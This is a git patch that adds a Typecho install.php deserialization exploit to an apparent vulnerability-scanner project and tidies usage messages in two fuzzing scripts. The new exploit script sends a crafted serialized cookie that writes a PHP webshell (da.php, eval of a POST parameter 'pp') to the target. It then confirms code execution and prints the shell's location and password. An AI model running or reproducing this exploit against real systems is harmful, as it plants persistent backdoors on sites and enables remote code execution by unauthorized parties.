From 98779e0b2d9c40d30abe94ecc7ccb123386ce9dd Mon Sep 17 00:00:00 2001 From: Lucifer1993 <297954441@qq.com> Date: Sun, 5 Nov 2017 13:36:33 +0800 Subject: [PATCH] =?UTF-8?q?add=20poc=20typecho=20install.php=E5=8F=8D?= =?UTF-8?q?=E5=BA=8F=E5=88=97=E5=8C=96=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cms/cmsmain.py | 3 ++ cms/seacms/seacms_search_jq_code_exec.py | 2 +- cms/typecho/__init__.py | 0 cms/typecho/typecho_install_code_exec.py | 44 ++++++++++++++++++++++++ pocdb.py | 1 + scan/arbitrarily_filefuzz_check.py | 8 +++-- scan/xss_characterfuzz_check.py | 8 +++-- 7 files changed, 61 insertions(+), 5 deletions(-) create mode 100644 cms/typecho/__init__.py create mode 100644 cms/typecho/typecho_install_code_exec.py diff --git a/cms/cmsmain.py b/cms/cmsmain.py index 9548cd1..a9ff04c 100755 --- a/cms/cmsmain.py +++ b/cms/cmsmain.py @@ -6,6 +6,9 @@ referer: unknow author: Lucifer description: 包含所有cms漏洞类型,封装成一个模块 ''' +#typecho vuls +from cms.typecho.typecho_install_code_exec import typecho_install_code_exec_BaseVerify + #foosun vuls from cms.foosun.foosun_City_ajax_sqli import foosun_City_ajax_sqli_BaseVerify diff --git a/cms/seacms/seacms_search_jq_code_exec.py b/cms/seacms/seacms_search_jq_code_exec.py index 0a5d55a..33b48bf 100755 --- a/cms/seacms/seacms_search_jq_code_exec.py +++ b/cms/seacms/seacms_search_jq_code_exec.py @@ -35,4 +35,4 @@ class seacms_search_jq_code_exec_BaseVerify: if __name__ == "__main__": warnings.filterwarnings("ignore") testVuln = seacms_search_jq_code_exec_BaseVerify(sys.argv[1]) - testVuln.run() \ No newline at end of file + testVuln.run() diff --git a/cms/typecho/__init__.py b/cms/typecho/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/cms/typecho/typecho_install_code_exec.py b/cms/typecho/typecho_install_code_exec.py new file mode 100644 index 0000000..d28eccc --- /dev/null +++ b/cms/typecho/typecho_install_code_exec.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +''' +name: typecho install.php反序列化命令执行 +referer: http://p0sec.net/index.php/archives/114/ +author: Lucifer +description: 漏洞产生在install.php中,base64后的值被反序列化和实例化后发生命令执行。 +''' +import sys +import requests +import warnings +from termcolor import cprint + +class typecho_install_code_exec_BaseVerify: + def __init__(self, url): + self.url = url + + def run(self): + headers = { + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Cookie":"__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTY6ImZpbGVfcHV0X2NvbnRlbnRzKCdkYS5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbcHBdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo3OiJ0eXBlY2hvIjt9", + "Referer":self.url + "/install.php", + "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + } + vulnurl = self.url + "/install.php?finish=1" + try: + req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) + shellpath = self.url + "/da.php" + post_data ={ + "pp":"phpinfo();" + } + req1 = requests.post(self.url + "/da.php", data=post_data, headers=headers, timeout=10, verify=False) + if r"Configuration File (php.ini) Path" in req1.text: + cprint("[+]存在typecho install.php反序列化命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tshell地址: "+shellpath+"\t密码: pp", "red") + + except: + cprint("[-] "+__file__+"====>连接超时", "cyan") + +if __name__ == "__main__": + warnings.filterwarnings("ignore") + testVuln = typecho_install_code_exec_BaseVerify(sys.argv[1]) + testVuln.run() \ No newline at end of file diff --git a/pocdb.py b/pocdb.py index 878ab47..e1982e6 100755 --- a/pocdb.py +++ b/pocdb.py @@ -24,6 +24,7 @@ class pocdb_pocs: "crossdomain.xml文件发现":crossdomain_find_BaseVerify(url), } self.cmspocdict = { + "typecho install.php反序列化命令执行":typecho_install_code_exec_BaseVerify(url), "Dotnetcms(风讯cms)SQL注入漏洞":foosun_City_ajax_sqli_BaseVerify(url), "韩国autoset建站程序phpmyadmin任意登录漏洞":autoset_phpmyadmin_unauth_BaseVerify(url), "phpstudy探针":phpstudy_probe_BaseVerify(url), diff --git a/scan/arbitrarily_filefuzz_check.py b/scan/arbitrarily_filefuzz_check.py index ec1692c..e9f59ee 100755 --- a/scan/arbitrarily_filefuzz_check.py +++ b/scan/arbitrarily_filefuzz_check.py @@ -188,5 +188,9 @@ class arbitrarily_filefuzz_check_BaseVerify: if __name__ == "__main__": warnings.filterwarnings("ignore") - testVuln = arbitrarily_filefuzz_check_BaseVerify(sys.argv[1]) - testVuln.run() + if len(sys.argv) < 2: + cprint("usage: python3 arbitrarily_filefuzz_check.py http://test.com/download.php?file=FUZZING", "cyan") + cprint("[*]将需要测试文件操作参数替换为FUZZING即可", "cyan") + else: + testVuln = arbitrarily_filefuzz_check_BaseVerify(sys.argv[1]) + testVuln.run() diff --git a/scan/xss_characterfuzz_check.py b/scan/xss_characterfuzz_check.py index 184384e..28cd5c1 100755 --- a/scan/xss_characterfuzz_check.py +++ b/scan/xss_characterfuzz_check.py @@ -116,5 +116,9 @@ class xss_characterfuzz_check_BaseVerify: if __name__ == "__main__": warnings.filterwarnings("ignore") - testVuln = xss_characterfuzz_check_BaseVerify(sys.argv[1]) - testVuln.run() + if len(sys.argv) < 2: + cprint("usage: python3 xss_characterfuzz_check.py http://test.com/test.php?id=FUZZING", "cyan") + cprint("[*]将需要测试XSS的参数替换为FUZZING即可", "cyan") + else: + testVuln = xss_characterfuzz_check_BaseVerify(sys.argv[1]) + testVuln.run()